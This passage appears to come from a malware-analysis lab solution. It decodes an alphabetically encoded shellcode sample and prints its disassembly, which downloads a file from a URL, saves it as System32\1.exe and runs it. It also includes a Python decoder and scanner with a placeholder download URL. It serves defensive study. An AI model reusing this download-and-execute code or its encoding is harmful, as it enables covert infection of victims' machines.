The shellcode writes %SystemRoot%\System32\1.exe and executes it.
The shellcode downloads a file from a URL stored within the encoded payload, writes it to disk, and executes it.
The shellcode decoder starts at ❶ in . It uses an alphabetic encoding with each encoded byte between 0x41 (A) and 0x50 (P). Each payload byte is stored in the low 4-bit nibble of two encoded bytes. The decoder loads each pair of encoded bytes, subtracts the base value 0x41, shifts and adds the two values, and stores the result back to memory. The push shown at ❷ is used to transfer control to the payload with the retn at ❸.
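As an added example (not the book's code nor the lab's shellcode), a small Python decoder for the alphabetic nibble encoding described above, plus a scanner that pulls candidate encoded blobs out of a dropped file or memory dump for analysis. It assumes the first byte of each pair carries the high nibble, which the text does not state, and the sample buffer is constructed.

```python
import re

BASE = 0x41                              # 'A'; encoded bytes are 'A' (0x41) .. 'P' (0x50)
ALPHABET = bytes(range(BASE, BASE + 16))


def decode_alpha_nibbles(encoded: bytes) -> bytes:
    """Undo the encoding: two 'A'..'P' bytes per payload byte, one nibble each.
    Assumption: the first byte of a pair holds the high nibble (the text only
    says the decoder shifts and adds the two values)."""
    if len(encoded) % 2:
        raise ValueError("encoded data must consist of whole pairs")
    out = bytearray()
    for hi, lo in zip(encoded[0::2], encoded[1::2]):
        if hi not in ALPHABET or lo not in ALPHABET:
            raise ValueError("byte outside 'A'..'P' cannot be part of the encoding")
        out.append(((hi - BASE) << 4) | (lo - BASE))
    return bytes(out)


def encode_alpha_nibbles(raw: bytes) -> bytes:
    """Inverse transform; used here only to build the constructed sample."""
    return bytes(b for v in raw for b in (BASE + (v >> 4), BASE + (v & 0x0F)))


def find_encoded_payloads(data: bytes, min_chars: int = 24) -> list:
    """Scan a buffer for runs of 'A'..'P' long enough not to be ordinary text
    and return (offset, decoded bytes) for each. An odd-length run loses its
    final unpaired character, as a pairwise decoder would leave it unread."""
    pattern = re.compile(rb"[A-P]{%d,}" % min_chars)
    hits = []
    for m in pattern.finditer(data):
        run = m.group()
        if len(run) % 2:
            run = run[:-1]
        hits.append((m.start(), decode_alpha_nibbles(run)))
    return hits


# Constructed sample: filler bytes around an encoded stub that carries a
# placeholder download URL, mimicking the URL stored at the end of the payload.
SAMPLE_PAYLOAD = b"\x90\x90\xeb\x0ehttp://download.example/1.exe\x00"
SAMPLE_PREFIX = b"Ordinary document text, nothing to see here.\n"
SAMPLE_BUFFER = SAMPLE_PREFIX + encode_alpha_nibbles(SAMPLE_PAYLOAD) + b"\x00ABC trailing text"

if __name__ == "__main__":
    for offset, payload in find_encoded_payloads(SAMPLE_BUFFER):
        print(f"encoded blob at offset {offset}: {payload!r}")
```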
The findKernel32Base function returns the location of kernel32.dll in memory, and the findSymbolByHash function manually parses the provided DLL in memory, looking for the export symbol whose name hashes to the given DWORD value. These function pointers are stored back onto the stack for use later. shows the decoded shellcode searching for function imports.

The shellcode calls GetSystemDirectoryA at ❶ and appends \1.exe to the returned path at ❷. This is used as the local filesystem path argument to URLDownloadToFileA, called at ❸. This function is commonly found in shellcode: a single call performs an HTTP GET to the URL the code specifies and stores the response at the specified file path. Here, the URL is the string stored at the end of the decoded shellcode. Finally, the shellcode executes the downloaded file at ❹ before cleanly exiting.

Example C-190. Shellcode payload
0000031E mov [ebp-18h], eax
00000321 push 80h
00000326 lea edi, [ebx+48h]
00000329 push edi
0000032A call dword ptr [ebp-8] ; GetSystemDirectoryA ❶
0000032D add edi, eax
0000032F mov dword ptr [edi], 652E315Ch ; "\\1.e" ❷
00000335 mov dword ptr [edi+4], 6578h ; "xe\x00"
0000033C xor ecx, ecx
0000033E push ecx
0000033F push ecx
00000340 lea eax, [ebx+48h]
00000343 push eax ; localFileSystemPath
00000344 lea eax, [ebx+7]
00000347 push eax ; URL to download
00000348 push ecx
00000349 call dword ptr [ebp-18h] ; URLDownloadToFileA ❸
0000034C push 5
00000351 lea eax, [ebx+48h] ; path to executable
00000354 push eax
00000355 call dword ptr [ebp-14h] ; WinExec ❹
00000358 call dword ptr [ebp-10h] ; GetCurrentProcess
0000035B push 0
00000360 push eax
00000361 call dword ptr [ebp-0Ch] ; TerminateProcess